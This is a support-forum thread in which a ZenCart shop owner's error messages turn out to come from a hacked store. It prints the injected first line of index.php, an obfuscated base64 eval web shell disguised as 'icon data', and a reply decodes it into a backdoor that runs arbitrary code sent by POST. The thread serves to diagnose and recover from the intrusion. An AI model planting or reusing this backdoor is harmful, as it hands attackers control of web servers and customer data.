Hello all,
I have a problem with my ZenCart that has thrown me completey. On the stores main page (www.emplore.com.au/buy/store) we get this error:

Notice: Undefined index: testorrr in /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/init_includes/init_templates.php on line 78

Then in the admin page (www.emplore.com.au/buy/store/admin) we get this:

Notice: Undefined index: testorrr in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/includes/init_includes/init_templates.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/includes/functions/general.php on line 34

Can anyone shed some light on this? I have NO IDEA what any of it means, its like a different language to me!

Thank you all for your help.

__________________

www.emplore.com.au

Have I been hacked??

__________________

www.emplore.com.au

I think the problem lies in line 1 of your '/buy/store/index.php' script.
The restof the errors come from that one.

What is line 1 of that script.

It seems to be related to 'teststorrr' - should that be 'teststore' or something?

Mike

__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net

thankyou.
um, line 1 is:

<?php /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/ eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWF poYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RoVjFsdlNrWTVTRkpX VW1KS00xSnNZek5TZG1OdVNubEtNVEE1VUZOamVFcDViRGRKUj FacVlVYzRaMG95YTJkaVJ6a3lXbE5DTldJelZXNVBlVUpzWlVk c01FOTVRamxKUVhCd1dtbG9jR016VG14a1EyZHJXREZDVUZVeF VtSktNbmgyWkcxVmJsaFRhM0JsZDNCc1pHMUdjMHREVW1aVlJU bFVWa1p6Ym1KSE9USmFVMlJrUzFSelMxcFlhSEJrUkhOTFpsRT lQU2NwS1RzPScpKTs='));?><?php

__________________

www.emplore.com.au

The error is in this bit - where did that come from?

'ZXZhbChiYXNlNjRfZGVjb2RlKCdaWF poYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RoVjFsdlNrWTVTRkpX VW1KS00xSnNZek5TZG1OdVNubEtNVEE1VUZOamVFcDViRGRKUj FacVlVYzRaMG95YTJkaVJ6a3lXbE5DTldJelZXNVBlVUpzWlVk c01FOTVRamxKUVhCd1dtbG9jR016VG14a1EyZHJXREZDVUZVeF VtSktNbmgyWkcxVmJsaFRhM0JsZDNCc1pHMUdjMHREVW1aVlJU bFVWa1p6Ym1KSE9USmFVMlJrUzFSelMxcFlhSEJrUkhOTFpsRT lQU2NwS1RzPScpKTs='

Did you have to insert this yourself?

__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net

i dont thnk i would have put it in - i dont go into those files...
do you think if i delete will it work again?

__________________

www.emplore.com.au

Hi

If you didn't insert this yourself then don't delete it.

If you put "zen cart Undefined index:" into google you get hundreds of references so you are not the only one with this problem.

If you Google "zen cart Undefined index: testorrr" you get three - one being your problem.

This is a Zen Cart problem for them to fix I think.

Regards

__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net

Yes, you have been hacked.

ZenCart have announced a security exploit that allows files to be written to, and run on, your server. See
http://www.zen-cart.com/forum/showthread.php?t=130161

The exploit also writes records to the record_company table, and you can see the names of files that have been written in there. One of them is a script to insert a piece of code into other files which will produce the error you are seeing.

You will need to re-install from backup, as probably many of your files will have been altered. However, it is safe to delete the line 1 quoted above (leave <?php in place). It is just base 64 encoded code for

if(\$_GET['testorrr']=='1'){ echo 'i love you'; exit; }
if(isset(\$_POST['love'])){
eval(\$_POST['love']);
exit;

thanks...
when i reinstall, will all our customers details be lost? i didn't do a backup... yes i know...!
ta.

__________________

www.emplore.com.au

It's the server files you need to restore rather than the database, unless you have got other hacks as well.

But you need to close the exploit first (see Zen link above), otherwise it will all just happen again. There are instructions there for recovering from hacks.

Are you saying you have made all the mods to Zen directly on the server, and you don't have a copy? In that case, you are in trouble because I think you will have to re-install and do your site config all over again.

Always create your site locally on your PC and then upload to the server.

Check with your webhost...most decent ones do daily or weekly
or monthly backups..

__________________

Ready made zencarts...Zencart Templates...Mods Available